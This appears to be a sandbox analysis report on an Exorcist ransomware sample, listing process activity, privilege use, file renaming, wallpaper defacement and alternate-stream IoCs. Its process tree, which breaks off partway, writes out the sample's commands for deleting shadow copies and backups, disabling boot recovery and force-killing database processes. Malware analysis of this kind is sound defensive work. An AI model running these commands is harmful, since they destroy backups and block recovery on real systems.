PID 1080 wrote to memory of 1740	1080	7e415d5a1b1235491cb698eb14817d31.exe	224
PID 1080 wrote to memory of 1740	1080	7e415d5a1b1235491cb698eb14817d31.exe	224
PID 1080 wrote to memory of 1740	1080	7e415d5a1b1235491cb698eb14817d31.exe	224
PID 1080 wrote to memory of 1740	1080	7e415d5a1b1235491cb698eb14817d31.exe	224
PID 1740 wrote to memory of 1396	1740	cmd.exe	226
PID 1740 wrote to memory of 1396	1740	cmd.exe	226
PID 1740 wrote to memory of 1396	1740	cmd.exe	226
PID 1740 wrote to memory of 1396	1740	cmd.exe	226
PID 1080 wrote to memory of 1568	1080	7e415d5a1b1235491cb698eb14817d31.exe	227
PID 1080 wrote to memory of 1568	1080	7e415d5a1b1235491cb698eb14817d31.exe	227
PID 1080 wrote to memory of 1568	1080	7e415d5a1b1235491cb698eb14817d31.exe	227
PID 1080 wrote to memory of 1568	1080	7e415d5a1b1235491cb698eb14817d31.exe	227
PID 1568 wrote to memory of 1668	1568	cmd.exe	229
PID 1568 wrote to memory of 1668	1568	cmd.exe	229
PID 1568 wrote to memory of 1668	1568	cmd.exe	229
PID 1568 wrote to memory of 1668	1568	cmd.exe	229
PID 1080 wrote to memory of 1880	1080	7e415d5a1b1235491cb698eb14817d31.exe	230
PID 1080 wrote to memory of 1880	1080	7e415d5a1b1235491cb698eb14817d31.exe	230
PID 1080 wrote to memory of 1880	1080	7e415d5a1b1235491cb698eb14817d31.exe	230
PID 1080 wrote to memory of 1880	1080	7e415d5a1b1235491cb698eb14817d31.exe	230
PID 1880 wrote to memory of 1584	1880	cmd.exe	232
PID 1880 wrote to memory of 1584	1880	cmd.exe	232
PID 1880 wrote to memory of 1584	1880	cmd.exe	232
PID 1880 wrote to memory of 1584	1880	cmd.exe	232
PID 1080 wrote to memory of 1888	1080	7e415d5a1b1235491cb698eb14817d31.exe	233
PID 1080 wrote to memory of 1888	1080	7e415d5a1b1235491cb698eb14817d31.exe	233
PID 1080 wrote to memory of 1888	1080	7e415d5a1b1235491cb698eb14817d31.exe	233
PID 1080 wrote to memory of 1888	1080	7e415d5a1b1235491cb698eb14817d31.exe	233
PID 1888 wrote to memory of 1976	1888	cmd.exe	235
PID 1888 wrote to memory of 1976	1888	cmd.exe	235
PID 1888 wrote to memory of 1976	1888	cmd.exe	235
PID 1888 wrote to memory of 1976	1888	cmd.exe	235
PID 1080 wrote to memory of 2024	1080	7e415d5a1b1235491cb698eb14817d31.exe	236
PID 1080 wrote to memory of 2024	1080	7e415d5a1b1235491cb698eb14817d31.exe	236
PID 1080 wrote to memory of 2024	1080	7e415d5a1b1235491cb698eb14817d31.exe	236
PID 1080 wrote to memory of 2024	1080	7e415d5a1b1235491cb698eb14817d31.exe	236
PID 2024 wrote to memory of 1360	2024	cmd.exe	238
PID 2024 wrote to memory of 1360	2024	cmd.exe	238
PID 2024 wrote to memory of 1360	2024	cmd.exe	238
PID 2024 wrote to memory of 1360	2024	cmd.exe	238
PID 1080 wrote to memory of 432	1080	7e415d5a1b1235491cb698eb14817d31.exe	239
PID 1080 wrote to memory of 432	1080	7e415d5a1b1235491cb698eb14817d31.exe	239
PID 1080 wrote to memory of 432	1080	7e415d5a1b1235491cb698eb14817d31.exe	239
PID 1080 wrote to memory of 432	1080	7e415d5a1b1235491cb698eb14817d31.exe	239
PID 432 wrote to memory of 2044	432	cmd.exe	241
PID 432 wrote to memory of 2044	432	cmd.exe	241
PID 432 wrote to memory of 2044	432	cmd.exe	241
PID 432 wrote to memory of 2044	432	cmd.exe	241
PID 1080 wrote to memory of 1108	1080	7e415d5a1b1235491cb698eb14817d31.exe	242
PID 1080 wrote to memory of 1108	1080	7e415d5a1b1235491cb698eb14817d31.exe	242
PID 1080 wrote to memory of 1108	1080	7e415d5a1b1235491cb698eb14817d31.exe	242
PID 1080 wrote to memory of 1108	1080	7e415d5a1b1235491cb698eb14817d31.exe	242
PID 1108 wrote to memory of 1440	1108	cmd.exe	244
PID 1108 wrote to memory of 1440	1108	cmd.exe	244
PID 1108 wrote to memory of 1440	1108	cmd.exe	244
PID 1108 wrote to memory of 1440	1108	cmd.exe	244
PID 1080 wrote to memory of 1472	1080	7e415d5a1b1235491cb698eb14817d31.exe	245
PID 1080 wrote to memory of 1472	1080	7e415d5a1b1235491cb698eb14817d31.exe	245
PID 1080 wrote to memory of 1472	1080	7e415d5a1b1235491cb698eb14817d31.exe	245
PID 1080 wrote to memory of 1472	1080	7e415d5a1b1235491cb698eb14817d31.exe	245
PID 1472 wrote to memory of 1608	1472	cmd.exe	247
PID 1472 wrote to memory of 1608	1472	cmd.exe	247
PID 1472 wrote to memory of 1608	1472	cmd.exe	247
PID 1472 wrote to memory of 1608	1472	cmd.exe	247
PID 1080 wrote to memory of 1604	1080	7e415d5a1b1235491cb698eb14817d31.exe	248
PID 1080 wrote to memory of 1604	1080	7e415d5a1b1235491cb698eb14817d31.exe	248
PID 1080 wrote to memory of 1604	1080	7e415d5a1b1235491cb698eb14817d31.exe	248
PID 1080 wrote to memory of 1604	1080	7e415d5a1b1235491cb698eb14817d31.exe	248
PID 1604 wrote to memory of 1824	1604	cmd.exe	250
PID 1604 wrote to memory of 1824	1604	cmd.exe	250
PID 1604 wrote to memory of 1824	1604	cmd.exe	250
PID 1604 wrote to memory of 1824	1604	cmd.exe	250
PID 1080 wrote to memory of 1796	1080	7e415d5a1b1235491cb698eb14817d31.exe	251
PID 1080 wrote to memory of 1796	1080	7e415d5a1b1235491cb698eb14817d31.exe	251
PID 1080 wrote to memory of 1796	1080	7e415d5a1b1235491cb698eb14817d31.exe	251
PID 1080 wrote to memory of 1796	1080	7e415d5a1b1235491cb698eb14817d31.exe	251
PID 1796 wrote to memory of 1776	1796	cmd.exe	253
PID 1796 wrote to memory of 1776	1796	cmd.exe	253
PID 1796 wrote to memory of 1776	1796	cmd.exe	253
PID 1796 wrote to memory of 1776	1796	cmd.exe	253
PID 1080 wrote to memory of 1004	1080	7e415d5a1b1235491cb698eb14817d31.exe	254
PID 1080 wrote to memory of 1004	1080	7e415d5a1b1235491cb698eb14817d31.exe	254
PID 1080 wrote to memory of 1004	1080	7e415d5a1b1235491cb698eb14817d31.exe	254
PID 1080 wrote to memory of 1004	1080	7e415d5a1b1235491cb698eb14817d31.exe	254
PID 1004 wrote to memory of 1684	1004	cmd.exe	256
PID 1004 wrote to memory of 1684	1004	cmd.exe	256
PID 1004 wrote to memory of 1684	1004	cmd.exe	256
PID 1004 wrote to memory of 1684	1004	cmd.exe	256
PID 1080 wrote to memory of 1644	1080	7e415d5a1b1235491cb698eb14817d31.exe	257
PID 1080 wrote to memory of 1644	1080	7e415d5a1b1235491cb698eb14817d31.exe	257
PID 1080 wrote to memory of 1644	1080	7e415d5a1b1235491cb698eb14817d31.exe	257
PID 1080 wrote to memory of 1644	1080	7e415d5a1b1235491cb698eb14817d31.exe	257
PID 1644 wrote to memory of 1768	1644	cmd.exe	259
PID 1644 wrote to memory of 1768	1644	cmd.exe	259
PID 1644 wrote to memory of 1768	1644	cmd.exe	259
PID 1644 wrote to memory of 1768	1644	cmd.exe	259
PID 1080 wrote to memory of 1764	1080	7e415d5a1b1235491cb698eb14817d31.exe	260
PID 1080 wrote to memory of 1764	1080	7e415d5a1b1235491cb698eb14817d31.exe	260
PID 1080 wrote to memory of 1764	1080	7e415d5a1b1235491cb698eb14817d31.exe	260
PID 1080 wrote to memory of 1764	1080	7e415d5a1b1235491cb698eb14817d31.exe	260
PID 1764 wrote to memory of 1964	1764	cmd.exe	262
PID 1764 wrote to memory of 1964	1764	cmd.exe	262
PID 1764 wrote to memory of 1964	1764	cmd.exe	262
PID 1764 wrote to memory of 1964	1764	cmd.exe	262
PID 1080 wrote to memory of 1960	1080	7e415d5a1b1235491cb698eb14817d31.exe	263
PID 1080 wrote to memory of 1960	1080	7e415d5a1b1235491cb698eb14817d31.exe	263
PID 1080 wrote to memory of 1960	1080	7e415d5a1b1235491cb698eb14817d31.exe	263
PID 1080 wrote to memory of 1960	1080	7e415d5a1b1235491cb698eb14817d31.exe	263
PID 1960 wrote to memory of 1952	1960	cmd.exe	265
PID 1960 wrote to memory of 1952	1960	cmd.exe	265
PID 1960 wrote to memory of 1952	1960	cmd.exe	265
PID 1960 wrote to memory of 1952	1960	cmd.exe	265
PID 1080 wrote to memory of 1996	1080	7e415d5a1b1235491cb698eb14817d31.exe	266
PID 1080 wrote to memory of 1996	1080	7e415d5a1b1235491cb698eb14817d31.exe	266
PID 1080 wrote to memory of 1996	1080	7e415d5a1b1235491cb698eb14817d31.exe	266
PID 1080 wrote to memory of 1996	1080	7e415d5a1b1235491cb698eb14817d31.exe	266
PID 1996 wrote to memory of 736	1996	cmd.exe	268
PID 1996 wrote to memory of 736	1996	cmd.exe	268
PID 1996 wrote to memory of 736	1996	cmd.exe	268
PID 1996 wrote to memory of 736	1996	cmd.exe	268
PID 1080 wrote to memory of 1204	1080	7e415d5a1b1235491cb698eb14817d31.exe	269
PID 1080 wrote to memory of 1204	1080	7e415d5a1b1235491cb698eb14817d31.exe	269
PID 1080 wrote to memory of 1204	1080	7e415d5a1b1235491cb698eb14817d31.exe	269
PID 1080 wrote to memory of 1204	1080	7e415d5a1b1235491cb698eb14817d31.exe	269
PID 1204 wrote to memory of 668	1204	cmd.exe	271
PID 1204 wrote to memory of 668	1204	cmd.exe	271
PID 1204 wrote to memory of 668	1204	cmd.exe	271
PID 1204 wrote to memory of 668	1204	cmd.exe	271
PID 1080 wrote to memory of 1356	1080	7e415d5a1b1235491cb698eb14817d31.exe	272
PID 1080 wrote to memory of 1356	1080	7e415d5a1b1235491cb698eb14817d31.exe	272
PID 1080 wrote to memory of 1356	1080	7e415d5a1b1235491cb698eb14817d31.exe	272
PID 1080 wrote to memory of 1356	1080	7e415d5a1b1235491cb698eb14817d31.exe	272
PID 1356 wrote to memory of 1500	1356	cmd.exe	274
PID 1356 wrote to memory of 1500	1356	cmd.exe	274
PID 1356 wrote to memory of 1500	1356	cmd.exe	274
PID 1356 wrote to memory of 1500	1356	cmd.exe	274
PID 1080 wrote to memory of 316	1080	7e415d5a1b1235491cb698eb14817d31.exe	275
PID 1080 wrote to memory of 316	1080	7e415d5a1b1235491cb698eb14817d31.exe	275
PID 1080 wrote to memory of 316	1080	7e415d5a1b1235491cb698eb14817d31.exe	275
PID 1080 wrote to memory of 316	1080	7e415d5a1b1235491cb698eb14817d31.exe	275
PID 316 wrote to memory of 1528	316	cmd.exe	277
PID 316 wrote to memory of 1528	316	cmd.exe	277
PID 316 wrote to memory of 1528	316	cmd.exe	277
PID 316 wrote to memory of 1528	316	cmd.exe	277
PID 1080 wrote to memory of 1452	1080	7e415d5a1b1235491cb698eb14817d31.exe	278
PID 1080 wrote to memory of 1452	1080	7e415d5a1b1235491cb698eb14817d31.exe	278
PID 1080 wrote to memory of 1452	1080	7e415d5a1b1235491cb698eb14817d31.exe	278
PID 1080 wrote to memory of 1452	1080	7e415d5a1b1235491cb698eb14817d31.exe	278
PID 1452 wrote to memory of 1800	1452	cmd.exe	280
PID 1452 wrote to memory of 1800	1452	cmd.exe	280
PID 1452 wrote to memory of 1800	1452	cmd.exe	280
PID 1452 wrote to memory of 1800	1452	cmd.exe	280
PID 1080 wrote to memory of 1820	1080	7e415d5a1b1235491cb698eb14817d31.exe	281
PID 1080 wrote to memory of 1820	1080	7e415d5a1b1235491cb698eb14817d31.exe	281
PID 1080 wrote to memory of 1820	1080	7e415d5a1b1235491cb698eb14817d31.exe	281
PID 1080 wrote to memory of 1820	1080	7e415d5a1b1235491cb698eb14817d31.exe	281
PID 1820 wrote to memory of 1788	1820	cmd.exe	283
PID 1820 wrote to memory of 1788	1820	cmd.exe	283
PID 1820 wrote to memory of 1788	1820	cmd.exe	283
PID 1820 wrote to memory of 1788	1820	cmd.exe	283
PID 1080 wrote to memory of 1828	1080	7e415d5a1b1235491cb698eb14817d31.exe	284
PID 1080 wrote to memory of 1828	1080	7e415d5a1b1235491cb698eb14817d31.exe	284
PID 1080 wrote to memory of 1828	1080	7e415d5a1b1235491cb698eb14817d31.exe	284
PID 1080 wrote to memory of 1828	1080	7e415d5a1b1235491cb698eb14817d31.exe	284
PID 1828 wrote to memory of 1876	1828	cmd.exe	286
PID 1828 wrote to memory of 1876	1828	cmd.exe	286
PID 1828 wrote to memory of 1876	1828	cmd.exe	286
PID 1828 wrote to memory of 1876	1828	cmd.exe	286
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	287
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	287
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	287
PID 1080 wrote to memory of 1336	1080	7e415d5a1b1235491cb698eb14817d31.exe	287
PID 1336 wrote to memory of 1872	1336	cmd.exe	289
PID 1336 wrote to memory of 1872	1336	cmd.exe	289
PID 1336 wrote to memory of 1872	1336	cmd.exe	289
PID 1336 wrote to memory of 1872	1336	cmd.exe	289
PID 1080 wrote to memory of 1644	1080	7e415d5a1b1235491cb698eb14817d31.exe	290
PID 1080 wrote to memory of 1644	1080	7e415d5a1b1235491cb698eb14817d31.exe	290
PID 1080 wrote to memory of 1644	1080	7e415d5a1b1235491cb698eb14817d31.exe	290
PID 1080 wrote to memory of 1644	1080	7e415d5a1b1235491cb698eb14817d31.exe	290
PID 1644 wrote to memory of 1924	1644	cmd.exe	292
PID 1644 wrote to memory of 1924	1644	cmd.exe	292
PID 1644 wrote to memory of 1924	1644	cmd.exe	292
PID 1644 wrote to memory of 1924	1644	cmd.exe	292
PID 1080 wrote to memory of 1984	1080	7e415d5a1b1235491cb698eb14817d31.exe	293
PID 1080 wrote to memory of 1984	1080	7e415d5a1b1235491cb698eb14817d31.exe	293
PID 1080 wrote to memory of 1984	1080	7e415d5a1b1235491cb698eb14817d31.exe	293
PID 1080 wrote to memory of 1984	1080	7e415d5a1b1235491cb698eb14817d31.exe	293
PID 1984 wrote to memory of 1580	1984	cmd.exe	295
PID 1984 wrote to memory of 1580	1984	cmd.exe	295
PID 1984 wrote to memory of 1580	1984	cmd.exe	295
PID 1984 wrote to memory of 1580	1984	cmd.exe	295
PID 1080 wrote to memory of 268	1080	7e415d5a1b1235491cb698eb14817d31.exe	296
PID 1080 wrote to memory of 268	1080	7e415d5a1b1235491cb698eb14817d31.exe	296
PID 1080 wrote to memory of 268	1080	7e415d5a1b1235491cb698eb14817d31.exe	296
PID 1080 wrote to memory of 268	1080	7e415d5a1b1235491cb698eb14817d31.exe	296
PID 268 wrote to memory of 704	268	cmd.exe	298
PID 268 wrote to memory of 704	268	cmd.exe	298
PID 268 wrote to memory of 704	268	cmd.exe	298
PID 268 wrote to memory of 704	268	cmd.exe	298
PID 1080 wrote to memory of 1884	1080	7e415d5a1b1235491cb698eb14817d31.exe	299
PID 1080 wrote to memory of 1884	1080	7e415d5a1b1235491cb698eb14817d31.exe	299
PID 1080 wrote to memory of 1884	1080	7e415d5a1b1235491cb698eb14817d31.exe	299
PID 1080 wrote to memory of 1884	1080	7e415d5a1b1235491cb698eb14817d31.exe	299
PID 1884 wrote to memory of 1076	1884	cmd.exe	301
PID 1884 wrote to memory of 1076	1884	cmd.exe	301
PID 1884 wrote to memory of 1076	1884	cmd.exe	301
PID 1884 wrote to memory of 1076	1884	cmd.exe	301
PID 1080 wrote to memory of 832	1080	7e415d5a1b1235491cb698eb14817d31.exe	302
PID 1080 wrote to memory of 832	1080	7e415d5a1b1235491cb698eb14817d31.exe	302
PID 1080 wrote to memory of 832	1080	7e415d5a1b1235491cb698eb14817d31.exe	302
PID 1080 wrote to memory of 832	1080	7e415d5a1b1235491cb698eb14817d31.exe	302
PID 832 wrote to memory of 1508	832	cmd.exe	304
PID 832 wrote to memory of 1508	832	cmd.exe	304
PID 832 wrote to memory of 1508	832	cmd.exe	304
PID 832 wrote to memory of 1508	832	cmd.exe	304
PID 1080 wrote to memory of 892	1080	7e415d5a1b1235491cb698eb14817d31.exe	310
PID 1080 wrote to memory of 892	1080	7e415d5a1b1235491cb698eb14817d31.exe	310
PID 1080 wrote to memory of 892	1080	7e415d5a1b1235491cb698eb14817d31.exe	310
PID 1080 wrote to memory of 892	1080	7e415d5a1b1235491cb698eb14817d31.exe	310
PID 892 wrote to memory of 844	892	cmd.exe	312
PID 892 wrote to memory of 844	892	cmd.exe	312
PID 892 wrote to memory of 844	892	cmd.exe	312
PID 892 wrote to memory of 844	892	cmd.exe	312

Kills process with taskkill 87 IoCs

evasion

pid	Process
1576	taskkill.exe
944	taskkill.exe
1044	taskkill.exe
1960	taskkill.exe
1736	taskkill.exe
1608	taskkill.exe
1508	taskkill.exe
1668	taskkill.exe
1512	taskkill.exe
1816	taskkill.exe
1552	taskkill.exe
1996	taskkill.exe
1872	taskkill.exe
1500	taskkill.exe
2028	taskkill.exe
1952	taskkill.exe
1076	taskkill.exe
1500	taskkill.exe
1880	taskkill.exe
1204	taskkill.exe
1356	taskkill.exe
1668	taskkill.exe
1584	taskkill.exe
1824	taskkill.exe
1500	taskkill.exe
1788	taskkill.exe
1520	taskkill.exe
1440	taskkill.exe
1340	taskkill.exe
364	taskkill.exe
1804	taskkill.exe
1684	taskkill.exe
1964	taskkill.exe
668	taskkill.exe
1872	taskkill.exe
1996	taskkill.exe
1056	taskkill.exe
2044	taskkill.exe
844	taskkill.exe
316	taskkill.exe
1824	taskkill.exe
564	taskkill.exe
844	taskkill.exe
1592	taskkill.exe
652	taskkill.exe
1116	taskkill.exe
1192	taskkill.exe
1396	taskkill.exe
1940	taskkill.exe
824	taskkill.exe
1768	taskkill.exe
1964	taskkill.exe
1004	taskkill.exe
1176	taskkill.exe
1564	taskkill.exe
1972	taskkill.exe
1772	taskkill.exe
1876	taskkill.exe
1204	taskkill.exe
1808	taskkill.exe
1632	taskkill.exe
1736	taskkill.exe
1776	taskkill.exe
1800	taskkill.exe
704	taskkill.exe
1592	taskkill.exe
1516	taskkill.exe
1576	taskkill.exe
520	taskkill.exe
1800	taskkill.exe
1176	taskkill.exe
1124	taskkill.exe
1924	taskkill.exe
1844	taskkill.exe
524	taskkill.exe
1572	taskkill.exe
1196	taskkill.exe
1976	taskkill.exe
1360	taskkill.exe
736	taskkill.exe
1108	taskkill.exe
1396	taskkill.exe
1580	taskkill.exe
1960	taskkill.exe
1940	taskkill.exe
1812	taskkill.exe
1528	taskkill.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp"	7e415d5a1b1235491cb698eb14817d31.exe

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\SplitShow.crw => C:\Users\Admin\Pictures\SplitShow.crw.easLCw	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\Pictures\SplitShow.crw.easLCw	7e415d5a1b1235491cb698eb14817d31.exe
File renamed	C:\Users\Admin\Pictures\UnblockSelect.crw => C:\Users\Admin\Pictures\UnblockSelect.crw.easLCw	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\Pictures\UnblockSelect.crw.easLCw	7e415d5a1b1235491cb698eb14817d31.exe
File renamed	C:\Users\Admin\Pictures\ExpandUpdate.raw => C:\Users\Admin\Pictures\ExpandUpdate.raw.easLCw	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\Pictures\ExpandUpdate.raw.easLCw	7e415d5a1b1235491cb698eb14817d31.exe

Deletes itself 1 IoCs

pid	Process
892	cmd.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Suspicious use of AdjustPrivilegeToken 127 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1592	WMIC.exe
Token: SeSecurityPrivilege	1592	WMIC.exe
Token: SeTakeOwnershipPrivilege	1592	WMIC.exe
Token: SeLoadDriverPrivilege	1592	WMIC.exe
Token: SeSystemProfilePrivilege	1592	WMIC.exe
Token: SeSystemtimePrivilege	1592	WMIC.exe
Token: SeProfSingleProcessPrivilege	1592	WMIC.exe
Token: SeIncBasePriorityPrivilege	1592	WMIC.exe
Token: SeCreatePagefilePrivilege	1592	WMIC.exe
Token: SeBackupPrivilege	1592	WMIC.exe
Token: SeRestorePrivilege	1592	WMIC.exe
Token: SeShutdownPrivilege	1592	WMIC.exe
Token: SeDebugPrivilege	1592	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1592	WMIC.exe
Token: SeRemoteShutdownPrivilege	1592	WMIC.exe
Token: SeUndockPrivilege	1592	WMIC.exe
Token: SeManageVolumePrivilege	1592	WMIC.exe
Token: 33	1592	WMIC.exe
Token: 34	1592	WMIC.exe
Token: 35	1592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1592	WMIC.exe
Token: SeSecurityPrivilege	1592	WMIC.exe
Token: SeTakeOwnershipPrivilege	1592	WMIC.exe
Token: SeLoadDriverPrivilege	1592	WMIC.exe
Token: SeSystemProfilePrivilege	1592	WMIC.exe
Token: SeSystemtimePrivilege	1592	WMIC.exe
Token: SeProfSingleProcessPrivilege	1592	WMIC.exe
Token: SeIncBasePriorityPrivilege	1592	WMIC.exe
Token: SeCreatePagefilePrivilege	1592	WMIC.exe
Token: SeBackupPrivilege	1592	WMIC.exe
Token: SeRestorePrivilege	1592	WMIC.exe
Token: SeShutdownPrivilege	1592	WMIC.exe
Token: SeDebugPrivilege	1592	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1592	WMIC.exe
Token: SeRemoteShutdownPrivilege	1592	WMIC.exe
Token: SeUndockPrivilege	1592	WMIC.exe
Token: SeManageVolumePrivilege	1592	WMIC.exe
Token: 33	1592	WMIC.exe
Token: 34	1592	WMIC.exe
Token: 35	1592	WMIC.exe
Token: SeBackupPrivilege	1072	vssvc.exe
Token: SeRestorePrivilege	1072	vssvc.exe
Token: SeAuditPrivilege	1072	vssvc.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	524	taskkill.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	844	taskkill.exe
Token: SeDebugPrivilege	1044	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	1632	taskkill.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	1356	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	1004	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	1116	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1192	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	1124	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	364	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	844	taskkill.exe
Token: SeDebugPrivilege	1056	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	1196	taskkill.exe
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	1976	taskkill.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	1440	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	1684	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	736	taskkill.exe
Token: SeDebugPrivilege	668	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	1528	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeDebugPrivilege	1580	taskkill.exe
Token: SeDebugPrivilege	704	taskkill.exe
Token: SeDebugPrivilege	1076	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe

Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist

NTFS ADS 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:fvridclnn	7e415d5a1b1235491cb698eb14817d31.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:qpgzqdhrezueflgcu	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:bjjhhsydsppbf	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:fvridclnn	7e415d5a1b1235491cb698eb14817d31.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:qszpymvdszkkeiaw	7e415d5a1b1235491cb698eb14817d31.exe

C:\Users\Admin\AppData\Local\Temp\7e415d5a1b1235491cb698eb14817d31.exe
"C:\Users\Admin\AppData\Local\Temp\7e415d5a1b1235491cb698eb14817d31.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry
- Modifies extensions of user files
- NTFS ADS
PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1452
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic.exe SHADOWCOPY DELETE /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd /C bcdedit.exe /set {default} recoveryenabled No
  2⤵
  PID:1336
- C:\Windows\SysWOW64\cmd.exe
  cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /C vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1848
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1784
- C:\Windows\SysWOW64\cmd.exe
  cmd /C C:\Windows\system32\vssvc.exe
  2⤵
  PID:1740
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wxServer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wxServer*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wxServerView*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1924
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wxServerView*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlmangr*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\SysWOW64\taskkill.exe
